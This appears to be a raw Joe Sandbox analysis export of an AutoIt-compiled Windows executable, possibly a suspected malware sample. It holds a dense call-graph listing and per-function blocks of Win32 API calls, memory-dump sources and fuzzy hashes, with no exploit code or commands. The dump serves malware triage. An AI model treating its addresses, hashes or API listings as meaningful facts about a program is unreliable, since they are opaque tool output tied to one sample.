library calls 100128->100222 100131 1289cb2 100131->100128 100133 1289cb8 100131->100133 100132 1289cd8 100132->100084 100221 1289bb3 58 API calls 4 library calls 100133->100221 100135 1289cc0 GetCurrentThreadId 100135->100084 100137 128d75e __write 100136->100137 100138 1289d8b __lock 58 API calls 100137->100138 100139 128d765 100138->100139 100140 1288955 __calloc_crt 58 API calls 100139->100140 100142 128d776 100140->100142 100141 128d781 __write @_EH4_CallFilterFunc@8 100141->100088 100142->100141 100143 128d7e1 GetStartupInfoW 100142->100143 100149 128d7f6 100143->100149 100150 128d925 100143->100150 100144 128d9ed 100238 128d9fd LeaveCriticalSection _doexit 100144->100238 100146 1288955 __calloc_crt 58 API calls 100146->100149 100147 128d972 GetStdHandle 100147->100150 100148 128d985 GetFileType 100148->100150 100149->100146 100149->100150 100152 128d844 100149->100152 100150->100144 100150->100147 100150->100148 100237 1289fab InitializeCriticalSectionAndSpinCount 100150->100237 100151 128d878 GetFileType 100151->100152 100152->100150 100152->100151 100236 1289fab InitializeCriticalSectionAndSpinCount 100152->100236 100156 1287e83 100155->100156 100157 12950b4 100155->100157 100161 1294c9b GetModuleFileNameW 100156->100161 100239 128899d 58 API calls __malloc_crt 100157->100239 100159 12950da _memmove 100160 12950f0 FreeEnvironmentStringsW 100159->100160 100160->100156 100162 1294ccf _wparse_cmdline 100161->100162 100164 1294d0f _wparse_cmdline 100162->100164 100240 128899d 58 API calls __malloc_crt 100162->100240 100164->100095 100166 1294ee9 100165->100166 100167 1294ef1 __NMSG_WRITE 100165->100167 100166->100099 100168 1288955 __calloc_crt 58 API calls 100167->100168 100171 1294f1a __NMSG_WRITE 100168->100171 100169 1294f71 100170 1282ed5 _free 58 API calls 100169->100170 100170->100166 100171->100166 100171->100169 100172 1288955 __calloc_crt 58 API calls 100171->100172 100173 1294f96 100171->100173 100176 1294fad 100171->100176 100241 1294787 58 API calls __cftof2_l 100171->100241 100172->100171 100174 1282ed5 _free 58 API calls 100173->100174 100174->100166 100242 1288f46 IsProcessorFeaturePresent 100176->100242 100178 1294fb9 100178->100099 100180 128327b __IsNonwritableInCurrentImage 100179->100180 100257 128a651 100180->100257 100182 1283299 __initterm_e 100183 1282ec0 __cinit 67 API calls 100182->100183 100184 12832b8 _doexit __IsNonwritableInCurrentImage 100182->100184 100183->100184 100184->100103 100186 1264948 100185->100186 100196 12649e7 100185->100196 100187 1264982 IsThemeActive 100186->100187 100260 12834ec 100187->100260 100191 12649ae 100272 1264a5b SystemParametersInfoW SystemParametersInfoW 100191->100272 100193 12649ba 100273 1263b4c 100193->100273 100196->100107 100197->100081 100198->100085 100199->100092 100203->100108 100204->100111 100223 1283547 100205->100223 100207 1283318 __init_pointers __initp_misc_winsig 100224 128a6a4 EncodePointer 100207->100224 100209 1283330 __init_pointers 100210 128a019 34 API calls 100209->100210 100210->100117 100211->100119 100212->100123 100213->100124 100216 128895c 100214->100216 100217 1288997 100216->100217 100219 128897a 100216->100219 100225 1295376 100216->100225 100217->100127 100219->100216 100219->100217 100233 128a2b2 Sleep 100219->100233 100220->100131 100221->100135 100222->100132 100223->100207 100224->100209 100226 1295381 100225->100226 100229 129539c 100225->100229 100227 129538d 100226->100227 100226->100229 100234 1288ca8 58 API calls __getptd_noexit 100227->100234 100228 12953ac RtlAllocateHeap 100228->100229 100231 1295392 100228->100231 100229->100228 100229->100231 100235 1283521 DecodePointer 100229->100235 100231->100216 100233->100219 100234->100231 100235->100229 100236->100152 100237->100150 100238->100141 100239->100159 100240->100164 100241->100171 100243 1288f51 100242->100243 100248 1288dd9 100243->100248 100247 1288f6c 100247->100178 100249 1288df3 _memset ___raise_securityfailure 100248->100249 100250 1288e13 IsDebuggerPresent 100249->100250 100256 128a2d5 SetUnhandledExceptionFilter UnhandledExceptionFilter 100250->100256 100252 1288ed7 ___raise_securityfailure 100253 128c776 ___crt_atoflt_l 6 API calls 100252->100253 100254 1288efa 100253->100254 100255 128a2c0 GetCurrentProcess TerminateProcess 100254->100255 100255->100247 100256->100252 100258 128a654 EncodePointer 100257->100258 100258->100258 100259 128a66e 100258->100259 100259->100182 100261 1289d8b __lock 58 API calls 100260->100261 100262 12834f7 DecodePointer EncodePointer 100261->100262 100325 1289ef5 LeaveCriticalSection 100262->100325 100264 12649a7 100265 1283554 100264->100265 100266 1283578 100265->100266 100267 128355e 100265->100267 100266->100191 100267->100266 100326 1288ca8 58 API calls __getptd_noexit 100267->100326 100269 1283568 100327 1288f36 9 API calls __cftof2_l 100269->100327 100271 1283573 100271->100191 100272->100193 100274 1263b59 __ftell_nolock 100273->100274 100325->100264 100326->100269 100327->100271 100764 126107d 100769 12671eb 100764->100769 100766 126108c 100767 1282ec0 __cinit 67 API calls 100766->100767 100768 1261096 100767->100768 100770 12671fb __ftell_nolock 100769->100770 100771 12677c7 59 API calls 100770->100771 100772 12672b1 100771->100772 100773 1264864 61 API calls 100772->100773 100774 12672ba 100773->100774 100800 128068b 100774->100800 100777 1267e0b 59 API calls 100778 12672d3 100777->100778 100779 1263f84 59 API calls 100778->100779 100780 12672e2 100779->100780 100781 12677c7 59 API calls 100780->100781 100782 12672eb 100781->100782 100783 1267eec 59 API calls 100782->100783 100784 12672f4 RegOpenKeyExW 100783->100784 100785 129ec0a RegQueryValueExW 100784->100785 100790 1267316 Mailbox 100784->100790 100786 129ec9c RegCloseKey 100785->100786 100787 129ec27 100785->100787 100786->100790 100799 129ecae _wcscat Mailbox __NMSG_WRITE 100786->100799 100788 1280f36 Mailbox 59 API calls 100787->100788 100789 129ec40 100788->100789 100792 126538e 59 API calls 100789->100792 100790->100766 100791 1267b52 59 API calls 100791->100799 100793 129ec4b RegQueryValueExW 100792->100793 100794 129ec68 100793->100794 100796 129ec82 100793->100796 100795 1267d2c 59 API calls 100794->100795 100795->100796 100796->100786 100797 1267f41 59 API calls 100797->100799 100798 1263f84 59 API calls 100798->100799 100799->100790 100799->100791 100799->100797 100799->100798 100801 1291ac0 __ftell_nolock 100800->100801 100802 1280698 GetFullPathNameW 100801->100802 100803 12806ba 100802->100803 100804 1267d2c 59 API calls 100803->100804 100805 12672c5 100804->100805 100805->100777 100806 b23b0 100822 b0000 100806->100822 100808 b2463 100825 b22a0 100808->100825 100828 b34b0 GetPEB 100822->100828 100824 b068b 100824->100808 100826 b22a9 Sleep 100825->100826 100827 b22b7 100826->100827 100829 b34da 100828->100829 100829->100824 100830 129fe35 100831 129fe3f 100830->100831 100870 126ac90 Mailbox _memmove 100830->100870 100892 1268e34 59 API calls Mailbox 100831->100892 100833 12dc3f4 96 API calls 100833->100870 100835 12c79ff 59 API calls 100835->100870 100837 126b5d5 100841 12681a7 59 API calls 100837->100841 100838 1280f36 59 API calls Mailbox 100857 126a097 Mailbox 100838->100857 100850 126a1b7 100841->100850 100842 12a03ae 100896 12c9ed4 89 API calls 4 library calls 100842->100896 100843 126b5da 100902 12c9ed4 89 API calls 4 library calls 100843->100902 100844 12681a7 59 API calls 100844->100857 100845 1267f41 59 API calls 100845->100870 100848 12677c7 59 API calls 100848->100857 100849 12a03bd 100851 1282ec0 67 API calls __cinit 100851->100857 100852 12b71e5 59 API calls 100852->100857 100854 12b63f2 Mailbox 59 API calls 100854->100850 100855 12a0d2f 100901 12c9ed4 89 API calls 4 library calls 100855->100901 100857->100837 100857->100838 100857->100842 100857->100843 100857->100844 100857->100848 100857->100850 100857->100851 100857->100852 100857->100855 100859 126a6ba 100857->100859 100886 126ca20 331 API calls 2 library calls 100857->100886 100887 126ba60 60 API calls Mailbox 100857->100887 100858 12dbd80 331 API calls 100858->100870 100900 12c9ed4 89 API calls 4 library calls 100859->100900 100860 12b63f2 Mailbox 59 API calls 100860->100870 100861 126b416 100891 126f803 331 API calls 100861->100891 100863 126a000 331 API calls 100863->100870 100864 12a0bc3 100898 1269df0 59 API calls Mailbox 100864->100898 100866 12a0bd1 100899 12c9ed4 89 API calls 4 library calls 100866->100899 100868 12a0bb5 100868->100850 100868->100854 100869 126b37c 100889 1269e9c 60 API calls Mailbox 100869->100889 100870->100833 100870->100835 100870->100845 100870->100850 100870->100857 100870->100858 100870->100860 100870->100861 100870->100863 100870->100864 100870->100866 100870->100869 100871 1280f36 59 API calls Mailbox 100870->100871 100874 126ade2 Mailbox 100870->100874 100877 126b685 100870->100877 100893 12b71e5 59 API calls 100870->100893 100894 12dc2a7 85 API calls 2 library calls 100870->100894 100871->100870 100873 126b38d 100890 1269e9c 60 API calls Mailbox 100873->100890 100874->100877 100880 126ae4f 100874->100880 100895 12b71e5 59 API calls 100874->100895 100897 12c9ed4 89 API calls 4 library calls 100877->100897 100880->100850 100880->100868 100880->100877 100881 1272123 95 API calls 100880->100881 100882 12de04b 130 API calls 100880->100882 100883 12de037 130 API calls 100880->100883 100884 12cd107 101 API calls 100880->100884 100885 12d4570 331 API calls 100880->100885 100888 1269df0 59 API calls Mailbox 100880->100888 100881->100880 100882->100880 100883->100880 100884->100880 100885->100880 100886->100857 100887->100857 100888->100880 100889->100873 100890->100861 100891->100877 100892->100870 100893->100870 100894->100870 100895->100874 100896->100849 100897->100868 100898->100868 100899->100868 100900->100850 100901->100843 100902->100850 100903 126568a 100904 1265c18 59 API calls 100903->100904 100905 126569c 100904->100905 100906 1265632 61 API calls 100905->100906 100907 12656aa 100906->100907 100909 12656ba Mailbox 100907->100909 100910 12681c1 MultiByteToWideChar 100907->100910 100911 12681e7 100910->100911 100912 126822e 100910->100912 100913 1280f36 Mailbox 59 API calls 100911->100913 100914 1267eec 59 API calls 100912->100914 100915 12681fc MultiByteToWideChar 100913->100915 100917 1268220 100914->100917 100918 12678ad 59 API calls 2 library calls 100915->100918 100917->100909 100918->100917 100919 126e608 100922 126d260 100919->100922 100921 126e616 100923 126d4dd 100922->100923 100924 126d27d 100922->100924 100937 126d6ab 100923->100937 100974 12c9ed4 89 API calls 4 library calls 100923->100974 100925 12a29ea 100924->100925 100926 12a2a39 100924->100926 100930 126d2a4 100924->100930 100929 12a29ed 100925->100929 100935 12a2a08 100925->100935 100969 12da4fb 331 API calls __cinit 100926->100969 100929->100930 100931 12a29f9 100929->100931 100930->100923 100932 1282ec0 __cinit 67 API calls 100930->100932 100930->100937 100939 126d594 100930->100939 100941 12688a0 68 API calls 100930->100941 100943 12a2b55 100930->100943 100946 1268620 69 API calls 100930->100946 100953 126a000 331 API calls 100930->100953 100954 12681a7 59 API calls 100930->100954 100956 1269f3a 100930->100956 100961 12686a2 68 API calls 100930->100961 100963 126859a 68 API calls 100930->100963 100964 126d0dc 331 API calls 100930->100964 100965 126d060 89 API calls 100930->100965 100966 126cedd 331 API calls 100930->100966 100970 1268bb2 68 API calls 100930->100970 100971 1269e9c 60 API calls Mailbox 100930->100971 100972 12b6ae3 60 API calls 100930->100972 100967 12dab0f 331 API calls 100931->100967 100932->100930 100935->100923 100968 12dafb7 331 API calls 3 library calls 100935->100968 100936 12a2c0e 100936->100936 100937->100921 100962 1268bb2 68 API calls 100939->100962 100941->100930 100942 126d5a3 100942->100921 100973 12da866 89 API calls 100943->100973 100946->100930 100953->100930 100954->100930 100957 1280f36 Mailbox 59 API calls 100956->100957 100958 1269f47 100957->100958 100959 1269f56 100958->100959 100960 1267f41 59 API calls 100958->100960 100959->100930 100960->100959 100961->100930 100962->100942 100963->100930 100964->100930 100965->100930 100966->100930 100967->100937 100968->100923 100969->100930 100970->100930 100971->100930 100972->100930 100973->100923 100974->100936
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,0129E6F1), ref: 012C44AB
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 012C44BC
                                                                  • FindClose.KERNEL32(00000000), ref: 012C44CC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                  • String ID:
                                                                  • API String ID: 48322524-0
                                                                  • Opcode ID: b6e479014c14b535fd6eabbdd72033b464641e27b15cdcf3ea9f3adc24047004
                                                                  • Instruction ID: 797fa61cabb14159bb11aacdd622bff3d6caaf3c406826d914aee8aa3a2d34d1
                                                                  • Opcode Fuzzy Hash: b6e479014c14b535fd6eabbdd72033b464641e27b15cdcf3ea9f3adc24047004
                                                                  • Instruction Fuzzy Hash: 69E0D831820941574330B638FC0D4EAB79CEF05235F104709FA35C10C4E77459108695
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01270BBB
                                                                  • timeGetTime.WINMM ref: 01270E76
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01270FB3
                                                                  • Sleep.KERNEL32(0000000A), ref: 01270FC1
                                                                  • LockWindowUpdate.USER32(00000000), ref: 0127105A
                                                                  • DestroyWindow.USER32 ref: 01271066
                                                                  • GetMessageW.USER32 ref: 01271080
                                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 012A51DC
                                                                  • TranslateMessage.USER32(?), ref: 012A5FB9
                                                                  • DispatchMessageW.USER32(?), ref: 012A5FC7
                                                                  • GetMessageW.USER32 ref: 012A5FDB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                  • API String ID: 4212290369-3242690629
                                                                  • Opcode ID: 35972f068baef6bcfc3e14dc0401b55aef58ef6e8b2c35cd19523c49c5f465e6
                                                                  • Instruction ID: a0b72360894aa1d4c4de7187a8e6d186bc0068067e413e8b904c067cfe980468
                                                                  • Opcode Fuzzy Hash: 35972f068baef6bcfc3e14dc0401b55aef58ef6e8b2c35cd19523c49c5f465e6
                                                                  • Instruction Fuzzy Hash: 96B2C070628342DFD724DF28C494BAFBBE5BF85304F54491DE69987291DB70E988CB82

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0129D51C
                                                                    • Part of subcall function 01267D2C: _memmove.LIBCMT ref: 01267D66
                                                                  • _memset.LIBCMT ref: 0126418D
                                                                  • _wcscpy.LIBCMT ref: 012641E1
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 012641F1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                  • String ID: Line:
                                                                  • API String ID: 3942752672-1585850449
                                                                  • Opcode ID: f1e90bc5c10f4404e5a68e78cb60ba0ead762bc82c6ec962578a22e2cfdd3dea
                                                                  • Instruction ID: a1878fc0fadff4a83c4cb908c6e2542c5f88526466237814591bfd909b8df240
                                                                  • Opcode Fuzzy Hash: f1e90bc5c10f4404e5a68e78cb60ba0ead762bc82c6ec962578a22e2cfdd3dea
                                                                  • Instruction Fuzzy Hash: EF31CF31528346AAD731FB64E844FEB77ECAF64304F10451EF694921D4EB70A688C792

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1223 12669ca-12669f1 call 1264f3d 1226 12669f7-1266a05 call 1264f3d 1223->1226 1227 129e38a-129e39a call 12c9604 1223->1227 1226->1227 1232 1266a0b-1266a11 1226->1232 1231 129e39f-129e3a1 1227->1231 1233 129e3c0-129e408 call 1280f36 1231->1233 1234 129e3a3-129e3a6 call 1264faa 1231->1234 1235 1266a17-1266a39 call 1266bec 1232->1235 1236 129e3ab-129e3ba call 12c4339 1232->1236 1242 129e40a-129e414 1233->1242 1243 129e42d 1233->1243 1234->1236 1236->1233 1246 129e428-129e429 1242->1246 1247 129e42f-129e442 1243->1247 1248 129e42b 1246->1248 1249 129e416-129e425 1246->1249 1250 129e5b9-129e5ca call 1282ed5 call 1264faa 1247->1250 1251 129e448 1247->1251 1248->1247 1249->1246 1260 129e5cc-129e5dc call 1267776 call 1265efb 1250->1260 1253 129e44f-129e452 call 12675e0 1251->1253 1257 129e457-129e479 call 1265f12 call 12c7492 1253->1257 1267 129e47b-129e488 1257->1267 1268 129e48d-129e497 call 12c747c 1257->1268 1276 129e5e1-129e611 call 12bfad2 call 1280fac call 1282ed5 call 1264faa 1260->1276 1269 129e580-129e590 call 126766f 1267->1269 1274 129e499-129e4ac 1268->1274 1275 129e4b1-129e4bb call 12c7466 1268->1275 1269->1257 1280 129e596-129e5b3 call 12674bd 1269->1280 1274->1269 1286 129e4bd-129e4ca 1275->1286 1287 129e4cf-129e4d9 call 1265f8a 1275->1287 1276->1260 1280->1250 1280->1253 1286->1269 1287->1269 1293 129e4df-129e4f7 call 12bfa6e 1287->1293 1298 129e4f9-129e518 call 1267f41 call 1265a64 1293->1298 1299 129e51a-129e51d 1293->1299 1322 129e53b-129e549 call 1265f12 1298->1322 1300 129e54b-129e54e 1299->1300 1301 129e51f-129e53a call 1267f41 call 1266999 call 1265a64 1299->1301 1304 129e56e-129e571 call 12c7428 1300->1304 1305 129e550-129e559 call 12bf98f 1300->1305 1301->1322 1312 129e576-129e57f call 1280fac 1304->1312 1305->1276 1315 129e55f-129e569 call 1280fac 1305->1315 1312->1269 1315->1257 1322->1312
                                                                  APIs
                                                                    • Part of subcall function 01264F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,013252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 01264F6F
                                                                  • _free.LIBCMT ref: 0129E5BC
                                                                  • _free.LIBCMT ref: 0129E603
                                                                    • Part of subcall function 01266BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 01266D0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                  • API String ID: 2861923089-1757145024
                                                                  • Opcode ID: 949ebdea5b0f1d72084d29c0b4c830745ecbc965c99ebd0d1f3fd0f79deec209
                                                                  • Instruction ID: 459cf390f9efe96b6526cfdd97ac0300bb017832a2eabee556c792ab6d29529b
                                                                  • Opcode Fuzzy Hash: 949ebdea5b0f1d72084d29c0b4c830745ecbc965c99ebd0d1f3fd0f79deec209
                                                                  • Instruction Fuzzy Hash: A5914F7193021AAFCF14EFA8DC909FDB7B8FF18314F054469E915AB2A0EB70A955CB50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                  • String ID:
                                                                  • API String ID: 2782032738-0
                                                                  • Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                                  • Instruction ID: c090c84319fd266167e8b46f0f312dc87968912284bf539ec4c07e75ab6f4d5a
                                                                  • Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                                  • Instruction Fuzzy Hash: 5F41F9316367879BEB28FE6DC880B6E7BA6AF54360B14853DEA55C76C0E670D940CB40
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 01264401
                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 012644A6
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 012644C3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_$_memset
                                                                  • String ID:
                                                                  • API String ID: 1505330794-0
                                                                  • Opcode ID: 8b2d9a73db5baf56d6fb45d49e8d266986a06ee1e4e13da2bb1b26a725123452
                                                                  • Instruction ID: b002ccac4609d71ddc1045089ffc66c5300e19342ebdbea24415f17c0c6e285d
                                                                  • Opcode Fuzzy Hash: 8b2d9a73db5baf56d6fb45d49e8d266986a06ee1e4e13da2bb1b26a725123452
                                                                  • Instruction Fuzzy Hash: AF317F705143428FD731EF64D4856ABBBE8FB49308F00092EE6DA87281D771A684CB92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CALL
                                                                  • API String ID: 0-4196123274
                                                                  • Opcode ID: 5967aefeace33b0ed7842085c8e333ed2d65efdb3ef7325ca07cab9e29b9e7eb
                                                                  • Instruction ID: 262f121de257753c6052a217f6b035f1eb8d71ceb94f9bbdee59ce1f965d0aad
                                                                  • Opcode Fuzzy Hash: 5967aefeace33b0ed7842085c8e333ed2d65efdb3ef7325ca07cab9e29b9e7eb
                                                                  • Instruction Fuzzy Hash: A6225C70628342CFDB24DF18C494B2ABBE5FF94304F14895DE9969B3A1D771E885CB82
                                                                  APIs
                                                                  • IsThemeActive.UXTHEME ref: 01264992
                                                                    • Part of subcall function 012834EC: __lock.LIBCMT ref: 012834F2
                                                                    • Part of subcall function 012834EC: DecodePointer.KERNEL32(00000001,?,012649A7,012B7F9C), ref: 012834FE
                                                                    • Part of subcall function 012834EC: EncodePointer.KERNEL32(?,?,012649A7,012B7F9C), ref: 01283509
                                                                    • Part of subcall function 01264A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000,00000000,?,009CA430,?,012649BA), ref: 01264A73
                                                                    • Part of subcall function 01264A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,009CA430,?,012649BA), ref: 01264A88
                                                                    • Part of subcall function 01263B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01263B7A
                                                                    • Part of subcall function 01263B4C: IsDebuggerPresent.KERNEL32 ref: 01263B8C
                                                                    • Part of subcall function 01263B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,013252F8,013252E0,?,?), ref: 01263BFD
                                                                    • Part of subcall function 01263B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 01263C81
                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 012649D2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                  • String ID:
                                                                  • API String ID: 1438897964-0
                                                                  • Opcode ID: eb23d11bbb7be5112afa33ab807872390f492cb97e4b13f8697701978d02cc75
                                                                  • Instruction ID: cf0f15296ff09906be20dccd735d194c9227204f0ac939a97cffef996eed643a
                                                                  • Opcode Fuzzy Hash: eb23d11bbb7be5112afa33ab807872390f492cb97e4b13f8697701978d02cc75
                                                                  • Instruction Fuzzy Hash: 6B118E718243129FC720EF29E84595ABBECFF95710F10451EF485972E0DB709A84CB91
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0126558F,?,?,?,?,?), ref: 012681DA
                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0126558F,?,?,?,?,?), ref: 0126820D
                                                                    • Part of subcall function 012678AD: _memmove.LIBCMT ref: 012678E9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
